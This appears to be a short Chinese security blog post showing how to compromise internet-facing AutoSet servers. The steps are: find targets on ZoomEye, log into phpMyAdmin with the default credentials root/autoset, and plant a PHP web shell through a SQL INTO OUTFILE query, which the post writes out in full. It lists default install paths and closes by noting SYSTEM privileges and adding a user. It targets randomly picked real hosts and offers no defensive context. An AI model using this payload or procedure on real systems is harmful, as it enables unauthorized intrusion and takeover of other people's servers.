- A+
所属分类:颓废's Blog
实战
在zoomeye搜索autoset
随便选择目标
左侧栏默认口令:root/autoset 登录phpmyadmin拿shell
C:/AutoSet9/public_html //网站默认路径 C:/autoset/server/mysql5/data //数据库默认路径 C:/Program Files/AutoSet8/public_html //写shell过程中发现版本不同路径不一样(phpinfo获取)
写shell成功
select '<?php system($_GET[chill]); ?>' INTO OUTFILE 'C://Program Files//AutoSet8//public_html//Chill.php'
system权限,直接添加用户
作者:边缘人
![[2021你懂的]天擎-前台sql注入(新)](http://cn-sec.com/wp-content/themes/begin-lts-1/img/random/3.jpg)
